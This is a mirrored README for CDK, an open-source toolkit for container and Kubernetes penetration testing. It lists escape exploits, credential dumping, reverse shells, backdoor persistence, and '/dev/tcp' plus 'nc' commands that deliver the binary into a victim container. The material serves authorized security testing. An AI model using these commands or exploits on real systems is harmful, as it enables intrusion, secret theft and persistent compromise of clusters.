All Projects → cdk-team → Cdk

cdk-team / Cdk

Licence: gpl-2.0
CDK is an open-sourced container penetration toolkit, offering stable exploitation in different slimmed containers without any OS dependency. It comes with penetration tools and many powerful PoCs/EXPs helps you to escape container and takeover K8s cluster easily.

Programming Languages

go
31211 projects - #10 most used programming language

Projects that are alternatives of or similar to Cdk

kubernetes-reading-notes
Kubernetes源码阅读笔记
Stars: ✭ 96 (-92.41%)
Mutual labels:  k8s, cloud-native
K3sup
bootstrap Kubernetes with k3s over SSH < 1 min 🚀
Stars: ✭ 4,012 (+217.41%)
Mutual labels:  cloud-native, k8s
siddhi-operator
Operator allows you to run stream processing logic directly on a Kubernetes cluster
Stars: ✭ 16 (-98.73%)
Mutual labels:  k8s, cloud-native
Metalk8s
An opinionated Kubernetes distribution with a focus on long-term on-prem deployments
Stars: ✭ 217 (-82.83%)
Mutual labels:  cloud-native, k8s
Openyurt
OpenYurt - Extending your native Kubernetes to edge(project under CNCF)
Stars: ✭ 750 (-40.66%)
Mutual labels:  cloud-native, k8s
Awesome Kubernetes Notes
awesome-kubernetes-notes 🎉
Stars: ✭ 249 (-80.3%)
Mutual labels:  cloud-native, k8s
vcluster
vcluster - Create fully functional virtual Kubernetes clusters - Each vcluster runs inside a namespace of the underlying k8s cluster. It's cheaper than creating separate full-blown clusters and it offers better multi-tenancy and isolation than regular namespaces.
Stars: ✭ 1,360 (+7.59%)
Mutual labels:  k8s, cloud-native
radondb-mysql-kubernetes
Open Source,High Availability Cluster,based on MySQL
Stars: ✭ 146 (-88.45%)
Mutual labels:  k8s, cloud-native
Kubesphere
The container platform tailored for Kubernetes multi-cloud, datacenter, and edge management ⎈ 🖥 ☁️
Stars: ✭ 8,315 (+557.83%)
Mutual labels:  cloud-native, k8s
Kube Scan
kube-scan: Octarine k8s cluster risk assessment tool
Stars: ✭ 566 (-55.22%)
Mutual labels:  cloud-native, k8s
Kubernetes 101
Kubernetes 101 - by Jeff Geerling
Stars: ✭ 169 (-86.63%)
Mutual labels:  cloud-native, k8s
Argo Workflows
Workflow engine for Kubernetes
Stars: ✭ 10,024 (+693.04%)
Mutual labels:  k8s, cloud-native
K8gb
A cloud native Kubernetes Global Balancer
Stars: ✭ 113 (-91.06%)
Mutual labels:  cloud-native, k8s
galaxykube
PolarDB-X Operator is a Kubernetes extension that aims to create and manage PolarDB-X cluster on Kubernetes.
Stars: ✭ 65 (-94.86%)
Mutual labels:  k8s, cloud-native
Kruise
Automate application management on Kubernetes (project under CNCF)
Stars: ✭ 2,819 (+123.02%)
Mutual labels:  k8s, cloud-native
Linstor Server
High Performance Software-Defined Block Storage for container, cloud and virtualisation. Fully integrated with Docker, Kubernetes, Openstack, Proxmox etc.
Stars: ✭ 374 (-70.41%)
Mutual labels:  cloud-native, k8s
Openebs
Leading Open Source Container Attached Storage, built using Cloud Native Architecture, simplifies running Stateful Applications on Kubernetes.
Stars: ✭ 7,277 (+475.71%)
Mutual labels:  cloud-native, k8s
Container Service Extension
Container Service for VMware vCloud Director
Stars: ✭ 66 (-94.78%)
Mutual labels:  cloud-native, k8s
K8s Offline
Offline installation package for kubernetes.
Stars: ✭ 72 (-94.3%)
Mutual labels:  k8s
K8s Mediaserver Operator
Repository for k8s Mediaserver Operator project
Stars: ✭ 81 (-93.59%)
Mutual labels:  k8s

CDK - Zero Dependency Container Penetration Toolkit

English | 简体中文

png

Legal Disclaimer

Usage of CDK for attacking targets without prior mutual consent is illegal. CDK is for security testing purposes only.

Overview

CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs helps you to escape container and takeover K8s cluster easily.

Installation/Delivery

Download latest release in https://github.com/cdk-team/CDK/releases/

Drop executable files into the target container and start testing.

TIPS: Deliver CDK into target container in real-world penetration testing

If you have an exploit that can upload a file, then you can upload CDK binary directly.

If you have an RCE exploit, but the target container has no curl or wget, you can use the following method to deliver CDK:

  1. First, host CDK binary on your host with public IP.
(on your host)
nc -lvp 999 < cdk
  1. Inside the victim container execute
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

Usage

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk auto-escape <cmd>
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
  cdk auto-escape <cmd>                     Escape container in different ways then let target execute <cmd>.

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.

Features

CDK have three modules:

  1. Evaluate: gather information inside container to find potential weakness.
  2. Exploit: for container escaping, persistance and lateral movement
  3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command will run the scripts below without local file scanning, using --full to enable all.

Tactics Script Supported Usage/Example
Information Gathering OS Basic Info link
Information Gathering Available Capabilities link
Information Gathering Available Linux Commands link
Information Gathering Mounts link
Information Gathering Net Namespace link
Information Gathering Sensitive ENV link
Information Gathering Sensitive Process link
Information Gathering Sensitive Local Files link
Information Gathering Kube-proxy Route Localnet(CVE-2020-8558) link
Discovery K8s Api-server Info link
Discovery K8s Service-account Info link
Discovery Cloud Provider Metadata API link

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]
Tactic Technique CDK Exploit Name Supported In Thin Doc
Escaping docker-runc CVE-2019-5736 runc-pwn
Escaping containerd-shim CVE-2020-15257 shim-pwn link
Escaping docker.sock PoC (DIND attack) docker-sock-check link
Escaping docker.sock RCE docker-sock-pwn link
Escaping Docker API(2375) RCE docker-api-pwn link
Escaping Device Mount Escaping mount-disk link
Escaping LXCFS Escaping lxcfs-rw link
Escaping Cgroups Escaping mount-cgroup link
Escaping Procfs Escaping mount-procfs link
Escaping Ptrace Escaping PoC check-ptrace link
Escaping Rewrite Cgroup(devices.allow) rewrite-cgroup-devices link
Discovery K8s Component Probe service-probe link
Discovery Dump Istio Sidecar Meta istio-check link
Remote Control Reverse Shell reverse-shell link
Credential Access Access Key Scanning ak-leakage link
Credential Access Dump K8s Secrets k8s-secret-dump link
Credential Access Dump K8s Config k8s-configmap-dump link
Privilege Escalation K8s RBAC Bypass k8s-get-sa-token link
Persistence Deploy WebShell webshell-deploy link
Persistence Deploy Backdoor Pod k8s-backdoor-daemonset link
Persistence Deploy Shadow K8s api-server k8s-shadow-apiserver link
Persistence K8s MITM Attack (CVE-2020-8554) k8s-mitm-clusterip link
Persistence Deploy K8s CronJob k8s-cronjob link

Note about Thin: The version about thin is prepared for container shells with a short life cycle such as Serverless. In order to be lighter, it will cut very few exploits that cause the program to become fat.

Tool Module

Running commands like in Linux, little different in input-args, see the usage link.

cdk nc [options]
cdk ps
Command Description Supported Usage/Example
nc TCP Tunnel link
ps Process Information link
ifconfig Network Information link
vi Edit Files link
kcurl Request to K8s api-server link
dcurl Request to Docker HTTP API link
ucurl Request to Docker Unix Socket link
rcurl Request to Docker Registry API
probe IP/Port Scanning link

Developer Docs

Contributing to CDK

First off, thanks for taking the time to contribute!

By reporting any issue, ideas or PRs, your GitHub ID will be listed here.

Bug Reporting

Bugs are tracked as GitHub Issues. Create an issue with the current CDK version, error msg and the environment. Describe the exact steps which reproduce the problem.

Suggesting Enhancements

Enhancement suggestions are tracked as GitHub Discussions. You can publish any thoughts here to discuss with developers directly.

Pull Requests

Fix problems or maintain CDK's quality:

  • Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
  • Running screenshots or logs before and after you fix the problem.

New feature or exploits:

  • Explain why this enhancement would be useful to other users.
  • Please enable a sustainable environment for us to review contributions.
  • Screenshots about how this new feature works.
  • If you are committing a new evaluate/exploit scripts, please add a simple doc to your PR message, here is an example.

Events

404StarLink 2.0 - Galaxy

png

Project CDK is now included in 404Team Starlink Project 2.0. Join the StarLink community to get in touch with CDK dev-team.

BlackHat Asia 2021 Arsenal

HITB SecConf 2021 Amsterdam

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].